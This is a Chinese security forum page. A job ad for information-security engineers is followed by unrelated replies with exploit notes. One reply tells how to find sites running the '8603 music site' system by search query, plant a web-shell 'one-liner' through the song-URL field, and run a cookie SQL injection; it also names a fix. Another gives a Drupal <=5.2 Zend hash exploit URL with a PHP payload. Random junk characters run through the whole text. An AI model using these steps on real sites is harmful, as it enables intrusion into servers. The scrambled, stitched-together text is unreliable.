最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 浙江政安信息安全研究中心招贤纳士啦!

  • 招聘职位: 其他职位
  • 公司名称: 浙江政安信息安全研究中心
  • 工作地点: 浙江
  • 专业要求: 计算机专业 
  • 学历要求: 大专
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.sitedirsec.com
  • 简历邮箱: 352113371@qq.com
  • 联系电话: 13000000000
  • 在线QQ: 352113371
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++浙江政安信息安全研究中心相关说明++++++++++

    浙江政安信息安全研究中心招贤纳士啦!
    % g3 W8 }3 S& [  {2 L6 k+ p简历投递:352113371@qq.com
    ) q% B$ T# J: R/ L
    0 s5 y0 C2 }0 p. _( Y: O职位:售前工程师 2名 【7000-15000】5 T+ e8 z, X8 k. [% m  D2 x
    岗位职责:& R7 X5 m6 T/ M0 W7 ?
    1、配合销售人员参与信息安全咨询服务及安全服务项目(包括渗透测试、漏洞扫描、APP安全测试、应急响应、安全加固、风险评估、安全规划、安全管理咨询等)的售前工作;
    2 F2 G- ^: G) O2 p/ i4 y( H: [2、配合销售人员准备与用户的技术交流、PPT等技术文件;) ^& c7 R# Q( p- o5 Q
    3、负责信息安全咨询服务及安全服务的实施工作;
    # H* q  Q4 Y, o. ]5 B4、负责信息安全解决方案的售前,对信息安全解决方案项目进行售前技术支持,并协助销售人员跟进项目进度,配合项目的招投标工作(特别是技术方案的编写);1 U, k  g- k! f* U' U
    5、负责信息安全咨询项目的现场调研、资料搜集、课题研究及用户答疑等工作;
    0 l# |! S7 G' k任职要求:8 `& W; Q! ?& o2 \5 H. c1 Q
    1、信息安全及计算机相关专业毕业,正规院校大学本科及以上学历。至少2年以上工作经验、有非常好的语言、文字组织能力;
    3 ~; O! a4 ~9 |$ @& [+ ^& l- t; ?2、有较广泛的IT基础知识,熟悉主流应用系统架构,对网络架构、加密认证类设备、网络安全产品深入了解;
    $ \7 v, f6 Y2 K3、熟悉企业IT规划的方法论和过程;
    $ E, {4 e, s9 c2 g7 K4、为客户提供过信息安全项目策划,具有丰富的信息安全项目策划和实施经验;
    " _6 z/ F$ y+ n& m1 K6 m5、熟练掌握ISO27001等国际国内信息安全管理体系有关标准,掌握或从事过风险评估工作;: O* g; F' F- f( M. u6 Y, A4 L
    6、具有良好的客户沟通能力及技巧;
    ) k, x" X; y: ^: v7 O2 F& B$ t4 x7、能适应经常性短期出差;' \$ o3 z+ Z5 l. p
    8、具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;/ {) \3 W& j! v; G/ q0 C% W# }0 D

    * G1 q$ c6 ^& ~) V, j$ t职位:高级信息与网络安全工程师 3名 【5000-25000】: l) t" d1 x- ]5 r+ J
    岗位职责:
    ; _6 B- s8 }5 |    常驻政府单位或国有企业用户现场,根据用户需求提供现场信息与网络安全相关的支持服务,具体内容包括日常安全设备巡检、安全风险事件处理和应急响应、应用系统漏洞扫描和渗透测试、系统安全加固等工作。相关事件要求能形成规范的书面文字材料进行汇报。
    ) @% V& m' x) _' Z& ?任职条件:. P. m, I5 m/ k9 j% i! e% y
    1、1-5年以上信息与网络安全相关工作经验。具有CCIE/CISP/CISSP等安全相关证书者优先;具有政府单位、大型企业单位驻场服务经历的优先;最终视工作年限和工作经验确定薪酬。
    $ x6 F) Y% Y: {; d6 J0 [( W2、熟悉路由器、交换机、防火墙、入侵检测等常见网络安全产品;熟悉windows、linux等操作系统;熟悉常见数据库如Oracle、Sql server、My sql等;
    * g& F" ^, F( l6 C; A3、对信息安全有兴趣和爱好,具有较强的学习能力。如无CISP证书的要求在入职以后3个月内取得证书。有渗透测试和应用开发经历与经验者优先;9 E" D1 h/ D* X
    4、有高度的责任心,能适应工作压力;具有较强的沟通协调能力,良好的口头表达和技术文档撰写能力。面试时要求提供3份以上本人撰写的安全相关技术文档和报告材料。$ S% r: P! x/ v  D: r) t0 k5 D$ ?
    + D; H( A  y0 `  ]
    职位: 安全服务工程师 3名 【5000-15000】4 o" {7 {8 v+ k9 o
    任职要求:  `6 O8 O6 K- Z& a4 D5 B) r% e
    1. 能力突出者专业学历不限;$ K! a8 Y" \: ?5 P) o3 }- f5 F9 |. ~- h, F
    2. 对网络安全攻防有浓厚的兴趣并愿意为之倾注大量精力,有较强的工作责任心和主动学习能力;7 A5 q  }- d8 }: v
    3. 熟练使用PHP、Python、Perl等任意一门编程语言;
    4 I% ~4 M( x, R4 o7 _% j( x4. 掌握MSSQL、MySQL、Oracle、SQLite等一种或几种主流数据库结构以及语法;1 `2 G1 x6 _1 Y3 H4 q1 i
    5. 熟练使用各种安全扫描,渗透工具,有丰富的安全渗透经验并能能独立完成渗透测试;- c2 p5 S  i6 H
    6. 熟悉常见Web漏洞产生的原理,熟悉Windows、Linux平台渗透测试、权限提升、后门分析、安全加固等。
    3 o1 p! f# K  x& f优先考虑:3 T6 O/ p' O( K% p" w
    1.有能够进行项目管理、售前工作者,对具体技术能力可以适当降低7 |9 @0 a% ]! G  t
    2.熟悉iOS & Android APP 等移动安全测试! z  ]0 L/ y$ [( l7 D6 j
    3.对智能设备、硬件安全测试有了解,熟悉相关常见协议# l4 J6 w, o. P6 j- ]* \
    4.有代码审计相关经验者,具备逆向分析能力更佳;
    ) U# Q( N2 y+ L  S0 M5 Q5. 在漏乌云、洞盒子、补天等漏洞平台提交过相关有效漏洞;1 n% e0 C+ K1 d# q0 G8 A
    6.具有其它可以秒杀面试官能力1 h- x& I/ `5 K3 t4 }4 @
    7.具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;

     

    您可能还想看的主题:

    安全宝招聘安全服务工程师

    关于信息安全等级保护

    600万用户遭泄密案告破 CSDN首吃信息安全罚单

    Windows 优化大师 Pro v7.99 木蚂蚁社区绿色专版

    合优网站管理系统存在SQL注射。。。原创首发~

    启明星辰招聘

    [HR]北京安码科技 信息安全工程师

    [HR]上海四域 信息安全工程师

    《信息安全架构》

    继续信息安全。

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    8603音乐网管理系统v2009.1001漏洞
    8603音乐网管理系统 v2009.1001 数据库可插入一句话和Cookies注入

    . @7 A6 u" O' O% \
    数据库未作任何处理,可以插入一句话。继续插入经典一句话
    2 a$ ^" K* n! U5 e" G& c

    4 y# f7 t6 k! C8 `( h
    Google: inurl:player.asp?classid 打开网页,点击 请你添加歌曲,在歌曲地址处插入一句话,提交,连接数据库即可。数据库地址:/data/%23datalink.asa

    ) s& f$ Y4 l# }. H
    二,classid处可以Cookies注入classid=request("classid")set rs1=server.createobject("adodb.recordset")rs1.open "select * from feilei where classid="&classid,conn,1,3classid=rs1("classid")

      ?( I3 G7 V2 Q, S( c; S: W
    这里多啰嗦几句。关于Cookies注入的问题。有人问寡人那几句代码为什么存在Cookies注入。这个其实寡人在 微尔网站管理系统V1.51的cookies注入 的文章里说过了。这里在啰嗦几下。如有错误,请不吝指正。

    3 K" a0 D9 l5 a
    变量都可以用request来直接取得的,并且是有先后顺序的,譬如你用这样的语句request("id")取得id变量,asp会先从Form过来的数据找变量,然后是QueryString部分,然后是Cookie部分。但是如果你指定了request.cookies("id")就只会从cookie里找变量内容,没有的话就为空,同理,如果用的是request.form("id")就会只从表单里取变量而不会理会其他提交方式中的内容。这三个取得变量的地方也是是我们经常提交数据的地方,并且都是很容易就能修改的,而player.asp他写的是直接request("classid"),并没有指明是那种方式,即使加了防注入,我们也可以突破防注入,用cookies注入,修补办法就是加上request的方法,把request("classid")改为request.queryString("classid"),
    8 G3 W3 F( \3 l# ?) X% _
    看看防注入页面,防注入页面只对 '----- 对 get query 值 的过滤.和 '-----对 post 表 单值的过滤.
    ; Z/ e* s$ t9 a% K# R1 k6 D: L" I
    也就是过滤了request.QueryString和request.form的方法,而并没有过滤request.cookies的方法,cookies注
    % L0 _% O5 k: |
    入也就产生了

    ; L  O5 N+ o# \0 }" ?
    用注入中转。
    8 K) D8 X. ^& ^, G, e

    ; K  \2 O! `" b5 q0 O9 d  K9 E+ ^( [' ^; O1 i
      Y' z- E& }; i" D  Y& G

    ( ^$ z) h9 h  P+ f) [: F) T! X
    7 c: m$ E+ A8 z3 |( y: C& q7 f+ w! J6 N* U2 ^3 D8 L' R; ?, C

    2 n% A' Y  \$ U9 `: W8 ]' p$ a7 Q0 i$ R+ {( ~" z' S

    ) [) i; |, M4 q
    ; c, N, w. U. g. _- J6 ^$ E0 j' v6 j' L! N: R+ Y$ m( J* x

    7 }& @; P6 c+ _  r, z+ c3 H5 `
    % E, I& j: C$ b( W- {: [) u& n5 t% K
    4 {3 E3 l& `* r+ w4 @6 T

    " ?  |) K& t1 g7 M& r; |7 R
    ( L+ Y( `! O5 Z& N9 {
    $ D8 h# ?4 K/ m& E2 c公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    发贴看看自己积分,呵呵,好像没有楼猪的多。9 S1 m* H5 l$ E1 s
    ! G$ P4 f  n3 Y4 T8 T- A
    - U1 x% a+ o' `0 s2 ]' a$ S. X5 Q
    1 e7 o- N' z2 l' ]/ O
    # v) N& U, z+ s
    $ H! V2 j' m1 A2 c

    ! d& R9 j& L: q; e, i) r8 P' Q1 `

    / _3 N+ A* z$ R( J2 J- d( P! q) X& l! i8 e5 k% Y9 `

    1 M1 y) `8 D; s& ^$ }1 u* y7 ]) n' {, _4 V. a( J0 p

    ' q4 a1 Y3 U# S$ P( S2 ~2 e% b0 ^/ D7 L8 a
    0 d2 {4 N- w" N

    : P4 t, J5 F# D% D4 B0 E7 c
    3 ?: U  l8 R- {' j4 N* `: U$ [( V  L$ g0 H2 r, i6 ~5 k
    - q$ F5 W7 O0 z7 w9 L- a& `; r4 K
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    php的zend哈希漏洞利用问题
    Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation VectorExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&amp;_menu[items][][type]=-1&amp;-312030023=1&amp;q=1/<?phpinfo();
    8 W# S$ u+ H/ ^, ^
    9 X: Q2 f5 w: Q6 i1 W# C* T# b# K* |
    : ^# l- T3 U3 c3 d: Y

    * I) R7 h, C. `0 F9 Y
    4 X! r0 ?1 m& \. _# T, n4 o- U9 }* D8 T, Y' X; v, }7 u3 ~( S

    / {/ @* @9 o( {# h, _  V: n+ a( z# Y6 A! L) ^

    , }, `) f3 K4 w/ _& g- o; h8 A+ t6 |* `

    9 y2 f; ~( h: O$ T/ @7 b
    7 @& ], m' P0 j; f( T" Z. \; `2 |+ T# t

    7 ?! s. [" ~" e0 Q7 N  m7 o6 k4 @: o- z: x* H
    % X) J' v  l8 S, _5 K6 O6 j9 t
    ' P; f8 ]) d" f+ c; l

    9 i* q+ s0 @: c0 O$ M) m公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表